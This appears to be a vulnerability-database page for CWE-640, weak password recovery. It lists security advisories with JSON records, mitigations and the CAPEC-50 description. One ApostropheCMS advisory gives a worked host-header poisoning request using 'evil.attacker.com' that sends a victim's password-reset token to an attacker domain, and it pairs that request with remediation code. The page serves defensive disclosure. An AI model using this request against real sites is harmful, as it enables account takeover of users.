Common Weakness Enumeration

CWE-640

Allowed-with-Review

Weak Password Recovery Mechanism for Forgotten Password

Abstraction: Base · Status: Incomplete

The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.

393 vulnerabilities reference this CWE, most recent first.

GHSA-FMR2-M7GC-577W

Vulnerability from github – Published: 2026-02-22 00:31 – Updated: 2026-02-26 15:31
VLAI
Summary
funadmin has Weak Password Recovery Mechanism for Forgotten Password
Details

A security flaw has been discovered in funadmin up to 7.1.0-rc4. Affected by this issue is the function repass of the file app/frontend/controller/Member.php. Performing a manipulation of the argument forget_code/vercode results in weak password recovery. Remote exploitation of the attack is possible. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "funadmin/funadmin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "7.1.0-rc4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-2895"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-26T15:31:41Z",
    "nvd_published_at": "2026-02-21T23:15:59Z",
    "severity": "LOW"
  },
  "details": "A security flaw has been discovered in funadmin up to 7.1.0-rc4. Affected by this issue is the function repass of the file app/frontend/controller/Member.php. Performing a manipulation of the argument forget_code/vercode results in weak password recovery. Remote exploitation of the attack is possible. The attack\u0027s complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-fmr2-m7gc-577w",
  "modified": "2026-02-26T15:31:41Z",
  "published": "2026-02-22T00:31:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2895"
    },
    {
      "type": "WEB",
      "url": "https://github.com/I4m6da/CVE/issues/2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/funadmin/funadmin"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.347206"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.347206"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.753971"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "funadmin has Weak Password Recovery Mechanism for Forgotten Password"
}

GHSA-FQC6-Q4RQ-Q3M4

Vulnerability from github – Published: 2023-06-23 18:30 – Updated: 2024-04-04 05:07
VLAI
Details

This issue was addressed with improved state management. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5, tvOS 16.5. An app firewall setting may not take effect after exiting the Settings app

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-28202"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-23T18:15:11Z",
    "severity": "MODERATE"
  },
  "details": "This issue was addressed with improved state management. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5, tvOS 16.5. An app firewall setting may not take effect after exiting the Settings app",
  "id": "GHSA-fqc6-q4rq-q3m4",
  "modified": "2024-04-04T05:07:20Z",
  "published": "2023-06-23T18:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28202"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT213757"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT213758"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT213761"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT213764"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FR7C-JV5V-7Q4H

Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2022-05-13 01:47
VLAI
Details

Azure AD Connect Password writeback, if misconfigured during enablement, allows an attacker to reset passwords and gain unauthorized access to arbitrary on-premises AD privileged user accounts aka "Azure AD Connect Elevation of Privilege Vulnerability."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-8613"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-06-29T13:29:00Z",
    "severity": "HIGH"
  },
  "details": "Azure AD Connect Password writeback, if misconfigured during enablement, allows an attacker to reset passwords and gain unauthorized access to arbitrary on-premises AD privileged user accounts aka \"Azure AD Connect Elevation of Privilege Vulnerability.\"",
  "id": "GHSA-fr7c-jv5v-7q4h",
  "modified": "2022-05-13T01:47:39Z",
  "published": "2022-05-13T01:47:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-8613"
    },
    {
      "type": "WEB",
      "url": "https://technet.microsoft.com/library/security/4033453"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/99294"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FV4F-72J5-C8MX

Vulnerability from github – Published: 2025-09-11 21:31 – Updated: 2025-09-11 21:31
VLAI
Details

Daikin Security Gateway is vulnerable to an authorization bypass through a user-controlled key vulnerability that could allow an attacker to bypass authentication. An unauthorized attacker could access the system without prior credentials.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-10127"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-11T20:15:33Z",
    "severity": "HIGH"
  },
  "details": "Daikin Security Gateway is vulnerable to an authorization bypass through\n a user-controlled key vulnerability that could allow an attacker to \nbypass authentication. An unauthorized attacker could access the system \nwithout prior credentials.",
  "id": "GHSA-fv4f-72j5-c8mx",
  "modified": "2025-09-11T21:31:55Z",
  "published": "2025-09-11T21:31:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10127"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-254-10"
    },
    {
      "type": "WEB",
      "url": "https://www.daikin.eu/en_us/customers/support.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-FWGH-82PJ-8VP9

Vulnerability from github – Published: 2023-01-10 21:30 – Updated: 2025-05-30 18:30
VLAI
Details

In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with any account. This allows remote attackers to enumerate accounts via a series of requests.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-30332"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-10T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with any account. This allows remote attackers to enumerate accounts via a series of requests.",
  "id": "GHSA-fwgh-82pj-8vp9",
  "modified": "2025-05-30T18:30:44Z",
  "published": "2023-01-10T21:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30332"
    },
    {
      "type": "WEB",
      "url": "https://cds.thalesgroup.com/en/tcs-cert/CVE-2022-30332"
    },
    {
      "type": "WEB",
      "url": "https://cwe.mitre.org/data/definitions/204.html"
    },
    {
      "type": "WEB",
      "url": "https://excellium-services.com/cert-xlm-advisory/CVE-2022-30332"
    },
    {
      "type": "WEB",
      "url": "https://help.talend.com/r/62tbPt7y~tPTxAB7y7KpeQ/H45WqEF32geNEZiGJnRwmw"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-G32F-CM3Q-JCMH

Vulnerability from github – Published: 2022-05-24 17:22 – Updated: 2022-05-24 17:22
VLAI
Details

In NGINX Controller 3.0.0-3.4.0, recovery code required to change a user's password is transmitted and stored in the database in plain text, which allows an attacker who can intercept the database connection or have read access to the database, to request a password reset using the email address of another registered user then retrieve the recovery code.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-5899"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-07-01T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In NGINX Controller 3.0.0-3.4.0, recovery code required to change a user\u0027s password is transmitted and stored in the database in plain text, which allows an attacker who can intercept the database connection or have read access to the database, to request a password reset using the email address of another registered user then retrieve the recovery code.",
  "id": "GHSA-g32f-cm3q-jcmh",
  "modified": "2022-05-24T17:22:15Z",
  "published": "2022-05-24T17:22:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5899"
    },
    {
      "type": "WEB",
      "url": "https://support.f5.com/csp/article/K25434422"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-G5MP-GQVH-992Q

Vulnerability from github – Published: 2025-07-22 03:30 – Updated: 2025-07-22 03:30
VLAI
Details

A vulnerability classified as problematic was found in jshERP up to 3.5. Affected by this vulnerability is an unknown functionality of the file /jshERP-boot/user/updatePwd. The manipulation leads to weak password recovery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-7948"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-22T01:15:23Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability classified as problematic was found in jshERP up to 3.5. Affected by this vulnerability is an unknown functionality of the file /jshERP-boot/user/updatePwd. The manipulation leads to weak password recovery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-g5mp-gqvh-992q",
  "modified": "2025-07-22T03:30:34Z",
  "published": "2025-07-22T03:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7948"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jishenghua/jshERP/issues/123"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.317089"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.317089"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.619277"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-G83R-7CWR-H2JW

Vulnerability from github – Published: 2025-05-23 15:31 – Updated: 2026-04-28 21:35
VLAI
Details

Weak Password Recovery Mechanism for Forgotten Password vulnerability in Gilblas Ngunte Possi PSW Front-end Login & Registration allows Password Recovery Exploitation. This issue affects PSW Front-end Login & Registration: from n/a through 1.13.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-47646"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-23T13:15:41Z",
    "severity": "CRITICAL"
  },
  "details": "Weak Password Recovery Mechanism for Forgotten Password vulnerability in Gilblas Ngunte Possi PSW Front-end Login \u0026amp; Registration allows Password Recovery Exploitation. This issue affects PSW Front-end Login \u0026amp; Registration: from n/a through 1.13.",
  "id": "GHSA-g83r-7cwr-h2jw",
  "modified": "2026-04-28T21:35:39Z",
  "published": "2025-05-23T15:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47646"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/psw-login-and-registration/vulnerability/wordpress-psw-front-end-login-registration-1-12-broken-authentication-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GF43-24G3-5HW2

Vulnerability from github – Published: 2026-05-14 18:27 – Updated: 2026-06-12 22:02
VLAI
Summary
Apostrophe has a Weak Password Recovery Mechanism for Forgotten Password and Improper Input Validation
Details

Summary

ApostropheCMS's password reset flow constructs the reset URL using req.hostname, which is derived directly from the attacker-controlled HTTP Host header when apos.baseUrl is not explicitly configured. An unauthenticated attacker who knows a victim's email address can send a crafted reset request that causes the application to email the victim a reset link pointing to the attacker's domain. When the victim clicks the link, the valid reset token is delivered to the attacker, enabling full account takeover.

Affected Component

modules/@apostrophecms/login/index.jsresetRequest route
Precondition: passwordReset: true is set and apos.baseUrl is not configured.

Vulnerability Details

The setPrefixUrls middleware (i18n layer) builds req.baseUrl using req.hostname:

// Simplified from i18n middleware
req.baseUrl = `${req.protocol}://${req.hostname}`;
req.absoluteUrl = req.baseUrl + req.url;

The resetRequest handler then passes this tainted value directly into URL construction:

const parsed = new URL(
  req.absoluteUrl,           // ← tainted by attacker's Host header
  self.apos.baseUrl
    ? undefined
    : `${req.protocol}://${req.hostname}${port}`  // ← also tainted
);
parsed.pathname = '/login';
parsed.searchParams.append('reset', reset);   // real, valid token
parsed.searchParams.append('email', user.email);
await self.email(..., { url: parsed.toString() }, ...);
// Email sent to victim with URL pointing to attacker-controlled domain

When apos.baseUrl is configured, it is used unconditionally and the attacker's Host header is ignored — that path is not vulnerable.

Attack Scenario

  1. Attacker identifies a valid user email (e.g. from the site's public interface).
  2. Attacker sends:
   POST /api/v1/login/reset-request
   Host: evil.attacker.com
   Content-Type: application/json

   {"email": "victim@example.com"}
  1. The application emails the victim:
   Click here to reset your password:
   http://evil.attacker.com/login?reset=TOKEN&email=victim@example.com
  1. Victim clicks the link; attacker's server captures TOKEN.
  2. Attacker calls the real target's reset endpoint with the captured token and sets a new password — full account takeover.

Preconditions

  • passwordReset: true configured in login module options (opt-in)
  • apos.baseUrl is not set (common in development and some production deployments)
  • Attacker knows or can enumerate a valid account email

Impact

Full account takeover of any account whose email address is known to the attacker. No authentication or interaction beyond sending a single HTTP request is required from the attacker. The victim need only click a link in a legitimate-looking password reset email from their own site.

Remediation

Operators (immediate): Always set apos.baseUrl in your configuration:

// app.js or module configuration
modules: {
  '@apostrophecms/express': {
    options: {
      baseUrl: 'https://yourdomain.com'
    }
  }
}

Framework fix (recommended): The resetRequest route should refuse to proceed if apos.baseUrl is not configured, rather than falling back to the tainted req.hostname. Example:

// In resetRequest handler
if (!self.apos.baseUrl) {
  throw self.apos.error(
    'invalid',
    'apos.baseUrl must be configured to enable password reset'
  );
}
const parsed = new URL(self.loginUrl(), self.apos.baseUrl);

This eliminates the attacker-controlled input entirely from the URL construction path.

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "apostrophe"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "4.29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45013"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-640"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T18:27:12Z",
    "nvd_published_at": "2026-06-12T21:16:22Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nApostropheCMS\u0027s password reset flow constructs the reset URL using `req.hostname`, \nwhich is derived directly from the attacker-controlled HTTP `Host` header when \n`apos.baseUrl` is not explicitly configured. An unauthenticated attacker who knows \na victim\u0027s email address can send a crafted reset request that causes the application \nto email the victim a reset link pointing to the attacker\u0027s domain. When the victim \nclicks the link, the valid reset token is delivered to the attacker, enabling full \naccount takeover.\n\n## Affected Component\n\n`modules/@apostrophecms/login/index.js` \u2014 `resetRequest` route  \nPrecondition: `passwordReset: true` is set **and** `apos.baseUrl` is not configured.\n\n## Vulnerability Details\n\nThe `setPrefixUrls` middleware (i18n layer) builds `req.baseUrl` using `req.hostname`:\n\n```js\n// Simplified from i18n middleware\nreq.baseUrl = `${req.protocol}://${req.hostname}`;\nreq.absoluteUrl = req.baseUrl + req.url;\n```\n\nThe `resetRequest` handler then passes this tainted value directly into URL construction:\n\n```js\nconst parsed = new URL(\n  req.absoluteUrl,           // \u2190 tainted by attacker\u0027s Host header\n  self.apos.baseUrl\n    ? undefined\n    : `${req.protocol}://${req.hostname}${port}`  // \u2190 also tainted\n);\nparsed.pathname = \u0027/login\u0027;\nparsed.searchParams.append(\u0027reset\u0027, reset);   // real, valid token\nparsed.searchParams.append(\u0027email\u0027, user.email);\nawait self.email(..., { url: parsed.toString() }, ...);\n// Email sent to victim with URL pointing to attacker-controlled domain\n```\n\nWhen `apos.baseUrl` is configured, it is used unconditionally and the attacker\u0027s \n`Host` header is ignored \u2014 that path is **not** vulnerable.\n\n## Attack Scenario\n\n1. Attacker identifies a valid user email (e.g. from the site\u0027s public interface).\n2. Attacker sends:\n```\n   POST /api/v1/login/reset-request\n   Host: evil.attacker.com\n   Content-Type: application/json\n\n   {\"email\": \"victim@example.com\"}\n```\n3. The application emails the victim:\n```\n   Click here to reset your password:\n   http://evil.attacker.com/login?reset=TOKEN\u0026email=victim@example.com\n```\n4. Victim clicks the link; attacker\u0027s server captures `TOKEN`.\n5. Attacker calls the real target\u0027s reset endpoint with the captured token and \n   sets a new password \u2014 full account takeover.\n\n## Preconditions\n\n- `passwordReset: true` configured in login module options (opt-in)\n- `apos.baseUrl` is **not** set (common in development and some production deployments)\n- Attacker knows or can enumerate a valid account email\n\n## Impact\n\nFull account takeover of any account whose email address is known to the attacker. \nNo authentication or interaction beyond sending a single HTTP request is required \nfrom the attacker. The victim need only click a link in a legitimate-looking \npassword reset email from their own site.\n\n## Remediation\n\n**Operators (immediate):** Always set `apos.baseUrl` in your configuration:\n\n```js\n// app.js or module configuration\nmodules: {\n  \u0027@apostrophecms/express\u0027: {\n    options: {\n      baseUrl: \u0027https://yourdomain.com\u0027\n    }\n  }\n}\n```\n\n**Framework fix (recommended):** The `resetRequest` route should refuse to proceed \nif `apos.baseUrl` is not configured, rather than falling back to the tainted \n`req.hostname`. Example:\n\n```js\n// In resetRequest handler\nif (!self.apos.baseUrl) {\n  throw self.apos.error(\n    \u0027invalid\u0027,\n    \u0027apos.baseUrl must be configured to enable password reset\u0027\n  );\n}\nconst parsed = new URL(self.loginUrl(), self.apos.baseUrl);\n```\n\nThis eliminates the attacker-controlled input entirely from the URL construction path.\n\n## References\n\n- [OWASP: Host Header Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection)\n- [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html)",
  "id": "GHSA-gf43-24g3-5hw2",
  "modified": "2026-06-12T22:02:13Z",
  "published": "2026-05-14T18:27:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-gf43-24g3-5hw2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45013"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apostrophecms/apostrophe"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apostrophe has a Weak Password Recovery Mechanism for Forgotten Password and Improper Input Validation"
}

GHSA-GGP6-PC6F-GH53

Vulnerability from github – Published: 2021-12-10 00:00 – Updated: 2023-08-08 15:31
VLAI
Details

An Incorrect Access Control vulnerability exists in Premiumdatingscript 4.2.7.7 via the password change procedure in requests\user.php.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-41694"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-09T16:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "An Incorrect Access Control vulnerability exists in Premiumdatingscript 4.2.7.7 via the password change procedure in requests\\user.php.",
  "id": "GHSA-ggp6-pc6f-gh53",
  "modified": "2023-08-08T15:31:24Z",
  "published": "2021-12-10T00:00:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41694"
    },
    {
      "type": "WEB",
      "url": "https://www.chudamax.com/posts/multiple-vulnerabilities-in-belloo-dating-script"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Make sure that all input supplied by the user to the password recovery mechanism is thoroughly filtered and validated.

Mitigation
Architecture and Design

Do not use standard weak security questions and use several security questions.

Mitigation
Architecture and Design

Make sure that there is throttling on the number of incorrect answers to a security question. Disable the password recovery functionality after a certain (small) number of incorrect guesses.

Mitigation
Architecture and Design

Require that the user properly answers the security question prior to resetting their password and sending the new password to the e-mail address of record.

Mitigation
Architecture and Design

Never allow the user to control what e-mail address the new password will be sent to in the password recovery mechanism.

Mitigation
Architecture and Design

Assign a new temporary password rather than revealing the original password.

CAPEC-50: Password Recovery Exploitation

An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.